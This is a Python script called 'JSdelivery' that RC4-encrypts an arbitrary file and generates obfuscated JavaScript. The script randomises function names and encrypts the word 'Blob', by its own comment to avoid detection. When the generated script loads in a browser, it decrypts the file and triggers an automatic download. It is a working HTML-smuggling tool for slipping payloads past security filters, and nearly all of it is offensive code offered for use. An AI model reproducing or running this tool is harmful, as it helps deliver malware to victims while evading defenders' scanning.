#!/usr/bin/env python3

import sys
import os
import argparse
import magic
import base64
import random
import string
from Crypto.Cipher import ARC4

banner = """
JSdelivery - Hide and deliver files with javascript
"""

def rand_ascii(length):
    return ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in range(length))

if __name__ == '__main__':

    # parse args
    parser = argparse.ArgumentParser(description = banner)
    parser.add_argument('file', default=None, help='path to the file to deliver')
    parser.add_argument('-m', '--mime', default=None, help='force the MIME type for the file to deliver')
    args = parser.parse_args()

    # load payload
    try:
        payload_path = os.path.abspath(args.file)

        with open(payload_path, 'rb') as f: payload = f.read()

        payload_mime = args.mime

        # force mime type if specified
        if payload_mime is None:
            mime = magic.Magic(mime=True)
            payload_mime = mime.from_file(payload_path)

        payload_filename = os.path.basename(payload_path)

    except IOError:
        print('Could not open or read file %s' % args.file)
        sys.exit(-1)

    # encrypt payload and related variables
    key = rand_ascii(8)

    cipher = ARC4.new(key)
    payload_ciphered = base64.b64encode(cipher.encrypt(payload)).decode()

    cipher = ARC4.new(key)
    payload_filename_ciphered = base64.b64encode(cipher.encrypt(payload_filename)).decode()

    cipher = ARC4.new(key)
    payload_mime_ciphered = base64.b64encode(cipher.encrypt(payload_mime)).decode()

    # generate javascript for blob downloader
    js_blob_downloader =  '(function(b,fname){if(window.navigator.msSaveOrOpenBlob)'
    js_blob_downloader += 'window.navigator.msSaveOrOpenBlob(b,fname);else{var a=window.document.createElement("a");'
    js_blob_downloader += 'a.href=window.URL.createObjectURL(b, {type:"' + payload_mime + '"});a.download=fname;'
    js_blob_downloader += 'document.body.appendChild(a);a.click();document.body.removeChild(a);}})'
    js_blob_downloader = js_blob_downloader.encode()

    cipher = ARC4.new(key)
    js_blob_downloader_ciphered = base64.b64encode(cipher.encrypt(js_blob_downloader)).decode()

    # generate random names for JS functions
    js_rc4_decrypt = rand_ascii(12)
    js_blob_rc4_decrypt = rand_ascii(12)
    js_get_key = rand_ascii(12)
    js_payload_ciphered = rand_ascii(12)
    js_blob_obj = rand_ascii(12)
    js_payload = rand_ascii(12)
    js_blob_downloader = rand_ascii(12)

    # js_rc4_decrypt = "rc4_decrypt"
    # js_blob_rc4_decrypt = "blob_rc4_decrypt"
    # js_get_key = "get_key"
    # js_payload_ciphered = "payload_ciphered"
    # js_blob_obj = "blob_obj"
    # js_payload = "payload"
    # js_blob_downloader = "blob_downloader"
    
    # encrypt "Blob" to avoid detection on "new Blob()"
    cipher = ARC4.new(key)
    js_blob_obj_ciphered = base64.b64encode(cipher.encrypt("Blob".encode())).decode()

    params = {
            "func_rc4_decrypt": js_rc4_decrypt,
            "func_blob_rc4_decrypt": js_blob_rc4_decrypt,
            "func_get_key": js_get_key,
            "key": key,
            "var_payload_ciphered": js_payload_ciphered,
            "payload_ciphered": payload_ciphered,
            "var_blob_obj": js_blob_obj,
            "blob_obj_ciphered": js_blob_obj_ciphered,
            "var_payload": js_payload,
            "mimetype_ciphered": payload_mime_ciphered,
            "var_blob_downloader" : js_blob_downloader,
            "blob_downloader_ciphered": js_blob_downloader_ciphered,
            "filename_ciphered": payload_filename_ciphered
    }

    output = """<script>function ${func_rc4_decrypt}(r,o){for(var t,e=[],n=0,a="",f=0;f<256;f++)e[f]=f;for(f=0;f<256;f++)n=(n+e[f]+r.charCodeAt(f%r.length))%256,t=e[f],e[f]=e[n],e[n]=t;f=0,n=0;for(var h=0;h<o.length;h++)n=(n+e[f=(f+1)%256])%256,t=e[f],e[f]=e[n],e[n]=t,a+=String.fromCharCode(o.charCodeAt(h)^e[(e[f]+e[n])%256]);return a;}
function ${func_blob_rc4_decrypt}(r,o){var s=[],j=0,x,res='';for(var i=0;i<256;i++)s[i]=i;for(i=0;i<256;i++)j=(j+s[i]+r.charCodeAt(i%r.length))%256,x=s[i],s[i]=s[j],s[j]=x;i=0;j=0;var data=atob(o);var dataLength=data.length;var array=new Uint8Array(new ArrayBuffer(dataLength));for(var y=0;y<dataLength;y++)i=(i+1)%256,j=(j+s[i])%256,x=s[i],s[i]=s[j],s[j]=x,array[y]=data.charCodeAt(y)^s[(s[i]+s[j])% 256];return array;}
var ${func_get_key} = function(){return "${key}"};
var ${var_payload_ciphered} = "${payload_ciphered}";
var ${var_blob_obj} = ${func_rc4_decrypt}(${func_get_key}(),atob("${blob_obj_ciphered}"));
setTimeout('var ${var_payload} = new '+${var_blob_obj}+'([${func_blob_rc4_decrypt}(${func_get_key}(), ${var_payload_ciphered})], {type: ${func_rc4_decrypt}(${func_get_key}(), atob("${mimetype_ciphered}"))})');
var ${var_blob_downloader} = ${func_rc4_decrypt}(${func_get_key}(), atob("${blob_downloader_ciphered}"));
setTimeout(${var_blob_downloader}+'(${var_payload}, ${func_rc4_decrypt}(${func_get_key}(), atob("${filename_ciphered}")))');</script>"""

    # output final result
    print(string.Template(output).substitute(params))
